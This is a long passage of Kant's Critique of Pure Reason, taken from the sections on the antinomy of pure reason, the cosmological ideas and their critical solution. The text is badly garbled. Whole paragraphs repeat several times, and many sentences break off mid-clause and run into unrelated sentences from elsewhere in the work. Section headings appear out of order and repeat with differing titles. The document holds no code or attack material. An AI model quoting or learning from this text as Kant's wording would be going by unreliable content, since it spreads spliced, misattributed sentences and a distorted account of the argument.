It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL DIALECTIC

We have sufficiently proved in the Transcendental Aesthetic that everything intuited in space or time, and therefore all objects of any experience possible to us, are nothing but appearances, that is, mere representations, only in such a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given through any possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience in its absolute completeness. Since the objects are nothing but mere representations, only in such a possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of any object in itself, nor as regards possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference how we choose to express ourselves, for we do not know which exists for the sake of the other. In the case, however, of a man and his coat, we do not say that a man is too tall for his coat, but that the coat is too short for the man.

We have thus been led to what is at least a well-grounded suspicion that the cosmological ideas, and with them all the mutually conflicting pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis and of the series thereby represented. In the major premise all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. omposition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress, and therefore for any possible concept of the understanding. We have thus been maintaining that the fault lies with the idea, in being too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small for that to which it is directed, namely, possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept. If it is finite and limited, we have a right to ask what determines these limits. Empty space is no self-subsistent correlate of things, and cannot be a condition at which we could stop; still less can it be an empirical condition, forming part of a possible experience. Why have we not expressed ourselves in the opposite manner, saying that in the former case the empirical concept is always too small for the idea, and in the latter too large, and that the blame therefore attaches to the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to any object. The possible empirical concept is therefore the standard by which we must judge whether the idea is a mere idea and thought-entity, or whether it finds its object in the world. For we can say of anything that it is too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress? The reason is this. Possible experience is that which can alone give reality to our concepts; in its absence a concept is a mere idea, without truth, that is, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress, and therefore for any possible concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between truth and dreams. As to the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. From this it then follows that appearances in general are nothing outside our representations — which is just what is meant by their transcendental ideality.

This remark is of some importance. It enables us to see that the proofs given in the fourfold antinomy are not merely baseless deceptions. On the supposition that appearances, and the sensible world which comprehends them all, are things in themselves, these proofs are indeed well-grounded. The conflict which results from the propositions thus obtained shows, however, that there is a fallacy in this assumption, and so leads us to the discovery of the true constitution of things, as objects of the senses. While the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself, the contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself neither as an infinite whole nor as a finite whole. It exists only in the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, without any condition of time, but in this minor premise they are possible only through the successive regress, which is given only in the process in which it is actually carried out.

When this error has thus been shown to be involved in the argument upon which both parties alike base their cosmological assertions, both might justly be dismissed, as being unable to offer any sufficient title in support of their claims.

But the quarrel is not thereby ended — as if one or both of the parties had been proved to be wrong in the actual doctrines they assert, that is, in the conclusions of their arguments. For although they have failed to support their contentions by valid grounds of proof, nothing seems to be clearer than that since one of them asserts that the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideality of appearances — a proof which ought to convince any who may not be satisfied by the direct proof given in the Transcendental Aesthetic. This proof would consist in the following dilemma. If the world is a whole existing in itself, it is either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposites.

If, therefore, we say that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposition of the two assertions is converted into a merely dialectical opposition. Since the world does not exist in itself, independently of the regressive series of my representations, it exists in itself apart from relation to our senses and possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of extending knowledge to fasten it to transcendental ideas, through which we really know only that we know nothing); if, I say, the empiricist were satisfied with this, his principle would be a maxim urging moderation in our pretensions, modesty in our assertions, and yet at the same time the greatest possible extension of our understanding, through the teacher fittingly assigned to us, namely, through experience. If such were our procedure, we should not be cut off from employing intellectual presuppositions and faith on behalf of our practical interest; only they could never be permitted to assume the title and dignity of science and rational insight. Knowledge, which as such is speculative, can have no other object than that supplied by experience; if we transcend the limits thus imposed, the synthesis which seeks, independently of experience, new species of knowledge, lacks that substratum of intuition upon which alone it can be exercised.

But when empiricism itself, as frequently happens, becomes dogmatic in its attitude towards ideas, and confidently denies whatever lies beyond the sphere of its intuitive knowledge, it betrays the same lack of modesty; and this is all the more reprehensible owing to the irreparable injury which is thereby caused to the practical interests of reason.

The contrast between the teaching of Epicurus and that of Plato is of this nature.

Each of the two types of philosophy says more than it knows. The former encourages and furthers knowledge, though to the prejudice of the practical; the latter supplies excellent practical principles, but it permits reason to indulge in ideal explanations of natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dialectic does not by any means favour scepticism, it certainly does favour the sceptical method, which can point to such dialectic as an example of its great services. For when the arguments of reason are allowed to oppose one another in unrestricted freedom, something advantageous, and likely to aid in the correction of our judgments, will always accrue, though it may not be what we set out to find. omposition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object [of our idea]. For as our object is only in our brain, and cannot be given outside it, we have only to take care to be at one with ourselves, and to avoid that amphiboly which transforms our idea into a supposed representation of an object that is empirically given and therefore to be known according to the laws of experience. The dogmatic solution is therefore not only uncertain, but impossible. The critical solution, which allows of complete certainty, does not consider the question objectively, but in relation to the foundation of the knowledge upon which the question is based.
§ 5
SCEPTICAL REPRESENTATION OF THE COSMOLOGICAL QUESTIONS IN THE FOUR TRANSCENDENTAL IDEAS

We should of ourselves desist from the demand that our questions be answered dogmatically, if from the start we understood that whatever the dogmatic answer might turn out to be it would only increase our ignorance, and cast us from one inconceivability into another, from one obscurity into another still greater, and perhaps even into contradictions. If our question is directed simply to a yes or no, we are well advised to leave aside the supposed grounds of the answer, and first consider what we should gain according as the answer is in the affirmative or in the negative. Should we then find that in both cases the outcome is mere nonsense, there will be good reason for instituting a critical examination of our question, to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small relatively to something else, only if the former is required for the sake of the latter, and has to be adapted to it.

Among the puzzles propounded in the ancient dialectical Schools was the question, whether, if a ball cannot pass through a hole, we should say that the ball is too large or the hole too small. In such a case it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL CONFLICT OF REASON WITH ITSELF

The whole antinomy of pure reason rests upon the dialectical argument: If the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances, it must either be too large or too small for any concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept, which, consisting as it does in a successive regress, can never reach the whole eternity that has elapsed. Or suppose that the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

